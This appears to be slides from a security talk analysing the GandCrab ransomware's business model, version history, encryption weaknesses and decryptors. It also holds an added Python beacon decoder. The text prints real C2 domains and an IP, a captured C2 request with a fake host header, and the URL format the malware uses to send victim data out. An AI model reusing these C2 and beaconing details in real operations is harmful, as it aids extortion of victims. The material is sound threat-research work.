GANDCRAB MENTALITY
Jasper Manuel, Joie Salvio
GandCrab Ransomware-as-a-Service
Images by @CryptoInsane
Ransomware-as-a-Service (RaaS)
• Affiliate scheme 60-40 or 70-30
• Speed, reliability, customization
• Includes FUD, support, update
• Panel and Admin websites in TOR network
• Must not target members of the Russian Commonwealth (AM, AZ, BY, RU, KZ, etc.)
Execution Flow (stages in the diagram)
• Encrypt Files
• Contact C2
• Delete Shadow Copies
• Generate Keys
• Terminate Processes
• Collect Victim Information
• Elevate Privilege
• Ransom Note
Ransom note and payment page (screenshots)
[Timeline slide: months Jan to Dec; the version slides below follow this timeline]
GandCrab v1
• First to use only DASH ($200-$1200)
• .GDCB extension / GDCB-DECRYPT.txt
• .bit TLD for C2
• Uses RSA-2048/AES-CBC
C2 domains
• gandcrab.bit • bleepingcomputer.bit • nomoreransom.bit • esetnod32.bit • emsisoft.bit
Vectors
• RIG Exploit Kit • GRANDSOFT Exploit Kit • SPAM
Internal Versions
• 1.0 • 1.1 • 2.1 • 2.1r • 2.2r • 2.3r • 2.3.1r
.bit domain resolution: nslookup.exe <domain> a.dnspod.com
Encrypted File Structure: [Encrypted File Content | AES Key Encrypted with RSA]
GandCrab v1 Weaknesses
• Hard-coded RC4 key for victim info: the gathered victim info is encrypted with RC4 under a key embedded in the binary before it is sent to the C2
Gathered victim info parameters (raw victim info):
Parameter   Description
action      always 'call'
ip          victim IP address
pc_user     username
pc_group    domain name the machine is under
pc_lang     locale (e.g. en-US)
pc_keyb     1=Russian, 0=non-Russian
os_major    Operating System (e.g. Windows 7 Ultimate)
os_bit      Operating System Architecture (e.g. x64, x86, ARM)
ransom_id   roughly based on the machine's root volume serial number
hdd         information of all drives [<drive_letter>:_<drive_type>_<free_space>]
pub_key     RSA Public Key
priv_key    RSA Private Key
version     internal version hard-coded in the binary
POST to http://<resolved-IP>/curl.php?token=<aff_id>
e.g. http://92.53.66.11/curl.php?token=1019
• CRYPT_VERIFYCONTEXT flag not set in the function that generates the RSA keys, so the generated private key is stored locally
GandCrab v1 Decryptor Released
• Feb 28, Romanian Police released a decryption tool for v1
• 50,000 victims in a month
• $300k - $600k estimated payments
• Mostly US and UK
GandCrab breach announcement
• Payment page was compromised
• GandCrab v2 will be released soon
• Fired the web developer
• “Fortified” their infrastructures
GandCrab v2
• .CRAB extension / CRAB-DECRYPT.txt
• Core payload is now a DLL
• Added info parameters: id, subid
• Fake host header: bitdefender.com
C2 domains
• gdcb.bit • emsisoft.bit • gandcrab.bit • politiaromana.bit • malwarehunterteam.bit
Internal Versions
• 1.0.0r • kto_zaskrinit_tot_pidor • 1.2.0 • 1.2.1
GandCrab v2 C2 request (captured POST, body truncated):
POST /loey?lfeighss=oa&eas=fai HTTP/1.1
Host: bitdefender.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Length: 5880
Cache-Control: no-cache

EQp98lcg4tzXH5KsHq7sNWqdQ8tncHJCkQO62jrhXSiV7VRDI88eJ5G2658rSKgAyfPUtJlUyIk5AOI+jkGHhmGiDgiVUzJjZSJ1Xyko1hgjn5r9mohEAQrviJj7PPdgPrTO/yyJdgRxH/o09gsT+NZ3T9Ou8qFPRa+/pNA07skamoilCi/M/vzTbaDIOsOEzmMLaKRChA9VyLhBF6acBRUQRVRLTLiF+TPHPKrgLzVpasnQtEyzVWCa0ETM9CyQUsNsWL30q8eFanG5qw8WcgkTpMPfNyqF1Eo62dBj1lFVM4603G…
Pseudo-random RC4 key
• Pseudo-random RC4 key to encrypt victim info: CRC32 (initial crc = 0x29a (666)) of the pseudo-random URL string, followed by the constant “europol”
  e.g. “fowge?eiplei=deoresc” + “europol” gives the RC4 key C10A57D3europol
• POST victim info to http://<resolved-IP>/<pseudo-random string>
  e.g. http://92.53.66.11/fowge?eiplei=deoresc
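As an added example (not from the slides or from the GandCrab code), a Python decoder for the RC4-protected victim-info beacon whose parameters are tabulated in the v1 section, together with the v2 key derivation shown just above: the real hard-coded v1 key is not on the page, so a placeholder key and a constructed beacon are used, and whether the seeded CRC-32 keeps the standard final XOR is an assumption, so v2_rc4_key's output should be compared against the slide's C10A57D3europol.

```python
from urllib.parse import parse_qs
EUROPOL_SUFFIX = "europol"   # constant appended to the CRC value in v2 (from the slides)

def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); symmetric, so it both decrypts and builds test samples."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def crc32_seeded(data: bytes, init: int = 0xFFFFFFFF) -> int:
    """Reflected CRC-32 (poly 0xEDB88320) whose register starts at `init`.
    With init=0xFFFFFFFF this equals zlib.crc32; the slides say v2 starts at 0x29a (666).
    Assumption: the final XOR with 0xFFFFFFFF is kept as in standard CRC-32."""
    crc = init
    for byte in data:
        crc ^= byte
        for _ in range(8):
            crc = (crc >> 1) ^ (0xEDB88320 if crc & 1 else 0)
    return crc ^ 0xFFFFFFFF

def v2_rc4_key(url_string: str) -> bytes:
    """v2 key = uppercase hex of the seeded CRC-32 of the pseudo-random URL string + 'europol'."""
    crc = crc32_seeded(url_string.encode(), init=0x29A)
    return f"{crc:08X}{EUROPOL_SUFFIX}".encode()

def decode_beacon(body: bytes, key: bytes) -> dict:
    """RC4-decrypt a captured POST body and split the urlencoded victim-info fields."""
    plain = rc4(key, body).decode("latin-1")
    return {k: v[0] for k, v in parse_qs(plain, keep_blank_values=True).items()}

def is_russian_keyboard(info: dict) -> bool:
    """pc_keyb=1 marks a Russian layout (the RaaS rule: such hosts are not targets)."""
    return info.get("pc_keyb") == "1"

# Constructed sample, not a real capture; the real hard-coded v1 key is not on the page.
SAMPLE_KEY = b"placeholder-v1-key"
SAMPLE_PLAIN = ("action=call&ip=203.0.113.5&pc_user=alice&pc_group=WORKGROUP&pc_lang=en-US"
                "&pc_keyb=0&os_major=Windows 7 Ultimate&os_bit=x64&ransom_id=1a2b3c4d"
                "&hdd=C:_FIXED_512&version=1.0")
SAMPLE_BODY = rc4(SAMPLE_KEY, SAMPLE_PLAIN.encode())
```

decode_beacon(SAMPLE_BODY, SAMPLE_KEY) returns the field dictionary for the constructed beacon; with a real capture, substitute the recovered key and the raw POST body.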
• CRYPT flag fixed in the function that generates the RSA keys
GandCrab v2.1
• Fake host header: ahnlab.com
C2 domains
• ransomware.bit • zonealarm.bit
Internal Versions • 2.3.1 • 2.3.2 • 3.0.0
GandCrab 2.1 ransom note (screenshot)
GandCrab v3
• Changes wallpaper
• Fake host header: yahoo.com
• Adds autorun to HKLM for admin users
C2 domains • carder.bit • ransomware.bit
Internal Versions • 3.0.0 • 3.0.1
GandCrab changes wallpaper (screenshot)
GandCrab v3 bug: unintentional “lock screen” on Windows 7 upon reboot
GandCrab v4
• Switches to RSA-Salsa20 encryption algorithm
• Encrypts offline
• Encrypts network shares
• Sandbox evasions (removed later)
• Anti-disassembly
• Removed wallpaper change
• Major code structure makeover
Internal Versions • v4.0 • v4.1 • v4.1.1 • v4.1.2 • v4.1.3 • v4.1.2 (new variant) • v4.2 • v4.2.1 • v4.3 • v4.4
Victim data and key in ransom note
Encrypted File Structure: [Encrypted File Content | Salsa20 Key Encrypted with RSA Public Key]
Keys in the ransom note:
• 32-byte Salsa20 key (encrypted with RSA)
• RSA-2048 private key (encrypted with the Salsa20 key); also stored in HKCU\Software\keys_data\data\private
GandCrab v4 Timeline (July to August)
• Jul 02: v4.0 • Salsa20/20 algorithm • Offline encryption • Encrypts network shares • Checks <8hex-chars>.lock
• Jul 04: v4.1 • Sends victim data to a long list of URLs
• Jul 11: v4.1.1 • No major changes
• Jul 13: Vaccine v1 • Ahnlab releases a vaccine based on the .lock filename
• Jul 17: v4.1.2 • Uses Salsa20 to generate the .lock filename
• Jul 18: Vaccine v2 • Ahnlab releases a second version of the vaccine
• v4.1.2 (new variant) • GandCrab switches to a mutex check
• v4.2 • Update picked up from the new 4.1.2 • Adds sandbox evasion tricks
• v4.1.3 • No major changes
• v4.2.1 • Removes the VM evasion function • Adds a link to a POC of a Denial-of-Service attack on Ahnlab’s AV component
• v4.3 • Adds anti-disassembly trick
• Aug 06: v4.4 • Works as a vaccine by creating the ransomware mutex; did not work on Win7 at first
(Remaining dates marked on the timeline: Jul 19, Jul 20, Aug 02)
GandCrab v5
• <5-10_random_char> extension
• Exploits used to elevate privilege: ALPC EoP vulnerability (CVE-2018-8440), Win32k EoP vulnerability (CVE-2018-8120)
• HTML ransom note, and added support for other languages
• Wallpaper feature (in some variants)
Internal Versions • v5.0 • v5.0.1 • v5.0.2 • v5.0.3 • v5.0.4 • v5.0.5
GandCrab v5 Decryptor
• GandCrab released keys for Syrian victims
• Bitdefender released a free decryptor for versions v1, v4, v5 (5.0.1-5.0.4)
• The decryptor does not work on v5.0.5, which came out just a day later
(Screenshots: post of the Syrian key release; Bitdefender releases free decryptor)
Crypter partnership
• GandCrab partners with NTCrypt for a crypter service
• $100 (one-time stub), $350 (two stubs/week)
(Screenshots: GandCrab announces “Crypt Competition”; NTCrypt wins the deal)
Conclusion
The people behind GandCrab…
• Have good marketing skills to keep the trust of their affiliates and to build new partnerships.
• Try to compensate for the not-so-advanced malware with quick releases of new variants.
• Are very quick to react to solutions against them.
• Are loud, crazy, and very confident in what they do.
[Chart: C2 Visit Count per domain by version (v1, v2, v2.1, v3); y-axis 0 to 350,000; domains: ransomware.bit, politiaromana.bit, nomoreransom.bit, malwarehunter.bit, gdcb.bit, gandcrab.bit, esetnod32.bit, emsisoft.bit, bleepingcomputer.bit, carder.bit]
[Chart: Online Infection Map, visit count (top 10); y-axis 0 to 1,500,000]
Move to Asian Market
• GandCrab looking for partners in a Chinese underground forum • VenusLocker campaign targeting South Korea
[Chart: Sample Distribution, samples received per month (2018) by version (v1 to v5); y-axis 0 to 12,000]
References
• https://securingtomorrow.mcafee.com/mcafee-labs/rapidly-evolving-ransomware-gandcrab-version-5-partners-with-crypter-service-for-obfuscation/
• https://research.checkpoint.com/gandcrab-ransomware-mindset/
• https://www.bleepingcomputer.com/news/security/gandcrab-devs-release-decryption-keys-for-syrian-victims/
• Special thanks to @MarceloRivero, @ValthekOn